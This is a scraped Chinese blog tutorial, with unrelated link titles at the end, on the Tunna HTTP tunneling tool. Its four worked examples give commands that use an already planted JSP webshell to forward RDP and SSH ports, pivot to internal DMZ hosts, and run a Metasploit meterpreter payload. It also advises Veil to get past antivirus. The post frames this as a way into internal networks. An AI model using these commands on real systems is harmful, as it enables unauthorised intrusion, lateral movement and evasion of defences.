HTTP tunneling工具-端口转发
来源:互联网 发布:守望先锋手机数据查询 编辑:程序博客网 时间:2024/05/16 09:35
原理:就是个HTTP tunneling工具
!php
+——————————————-+ +——————————————-+
+——————————————-+ +—————————————— +
可以看出该工具先使用proxy.py监听本地一个端口,然后连接部署在远程WEB的webshell,远端的webshell会把端口转发请求转发到本地或者本地内网远程的主机,从而实现HTTP tunneling.这对于内网入侵来说,是很有用的一个工具.
该工具看起来是不是有似曾相识的感觉,恩.其实和reduh原理是一样的,不过tunna更稳定,速度更快.
下载地址是:http://www.secforce.com/media/tools/tunna_v0.1.zip
下面讲解4个实例,就能掌握该工具使用方法了.
实例1:
网站对外只开放了80端口,其他的端口都是关闭的,通过CVE-2013-225得到JSP的WEBSHELL后,上传conn.jsp,做转发,实现连接本机的其他端口.直接扫描发现3389是关闭的
mickey@pentest:~# nmap -sS -p3389 219.x.x.xStarting Nmap 6.40 ( http://nmap.org ) at 2013-09-26 22:47 EDTNmap scan report for 219.x.x.xHost is up (0.0088s latency).PORT STATE SERVICE3389/tcp close 通过webshell上传conn.jsp到主机上,本地开始连接python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 3389 -v参数含义如下:-l 表示本地监听的端口-r 远程要转发的端口-v 详细模式然后本地执行rdesktop 127.0.0.1:1234就可以连接到目标的3389了
实例2:
对于有些服务,比如SSH,还需要添加-s参数,才能保证连接的时候不会中断.
python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 22 -v -sssh localhost -p 1234
实例3:
场景:已经得到DMZ区的一台主机的JSPSHELL,该主机的内网IP是172.16.100.20,通过查点,发现DMZ区还有其他的主机(172.16.100.20),并且开放了3389,我们想利用HTTP tunneling,连接到172.16.100.20的3389,命令如下
python2.7 proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -a 172.16.100.20 -r 3389这里多了一个-a参数,意义是要转发的IP实例4:
对于喜欢metasploit的朋友,该工具也支持,不过如果对方有杀软的话,建议先用veil做好meterpreter的免杀.
首先把tunna_exploit.rb拷贝到msf的modules/exploits/windows/misc目录.cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc然后开始利用msf > use exploit/windows/misc/tunna_exploitmsf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcpPAYLOAD => windows/meterpreter/bind_tcpmsf exploit(tunna_exploit) > set RHOST 1.3.3.7 <-- 注意这里是指本地的公网IPRHOST => 1.3.3.7msf exploit(tunna_exploit) > set TARGETURI http://219.x.x.x:8080/conn.jspTARGETURI => http://219.x.x.x:8080/conn.jspmsf exploit(tunna_exploit) > set VERBOSE trueVERBOSE => truemsf exploit(tunna_exploit) > exploit -jtunna除了支持jsp还支持以下环境和脚本conn.jsp Tested on Apache Tomcat (windows + linux) conn.aspx Tested on IIS 6+8 (windows server 2003/2012) conn.php Tested on LAMP + XAMPP + IIS (windows + linux)使用的时候需要注意:metasploit里的脚本只对应metasploit使用.
0 0
- HTTP tunneling工具-端口转发
- 端口转发工具使用
- 端口转发工具
- linux 端口转发工具
- 免费的端口转发工具
- LCX端口转发工具使用
- BT5工具使用-tunneling
- linux下端口转发工具rinetd
- JSP端口转发工具 – KPortTran
- 端口转发、重定向工具 rinetd
- [喵咪Liunx(3)]端口转发工具rinetd
- JSP端口转发工具–KPortTran
- lcx端口转发工具的使用
- 端口转发工具lcx使用两类
- Tunneling
- Tunneling
- 端口转发
- 端口转发
- 分布式锁redis实现
- HDU5762 Teacher Bo 多校联赛第三场1011
- Hibernate中通过HQL/JPQL查询的方式实现动态数据获取
- hdu5755Gambler Bo
- 基本的sql语句
- HTTP tunneling工具-端口转发
- ERROR C2514:XXX类没有构造函数
- Sublime text 3最新版破解方法
- HDU 2199 Can you solve this equation?(二分法求近似解)
- 打开文件和写文件的操作
- 浅谈WPF中的MVVM
- 基于C#的Windows定时关机系统的设计
- encodeURI 和 encodeURIComponent
- JAVA_final修饰符
